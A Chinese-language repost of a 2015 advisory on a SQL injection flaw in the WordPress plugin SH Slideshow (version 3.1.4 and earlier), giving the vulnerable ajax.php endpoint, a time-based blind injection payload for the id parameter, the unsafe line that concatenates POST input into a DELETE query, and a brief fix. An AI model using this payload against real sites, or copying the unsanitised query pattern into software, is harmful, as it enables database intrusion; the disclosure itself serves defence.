WordPress插件SH Slideshow <= 3.1.4 SQL注射缺陷及修复-自学php网

WordPress插件SH Slideshow <= 3.1.4 SQL注射缺陷及修复

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 标题: WordPress SH Slideshow plugin = 3.1.4 SQL Injection Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) www.2cto.com下载地址: http://downloads.wordp......

标题: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability
作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) www.2cto.com
下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
影响版本: 3.1.4 (已测试)

---------------

测试方法

---------------

http://www.2cto.com /wp-content/plugins/sh-slideshow/ajax.php

id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------

缺陷代码分析

---------------

$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);

修复：对该页面参数输入进行过滤

短名突破可执行文件上传限制 - 网站安全 - 自学

对中国安全信息网的一次检测(管理员已修复漏洞

子栏目

WordPress插件SH Slideshow <= 3.1.4 SQL注射缺陷及修复

最新评论

添加评论

更多文章推荐

添加评论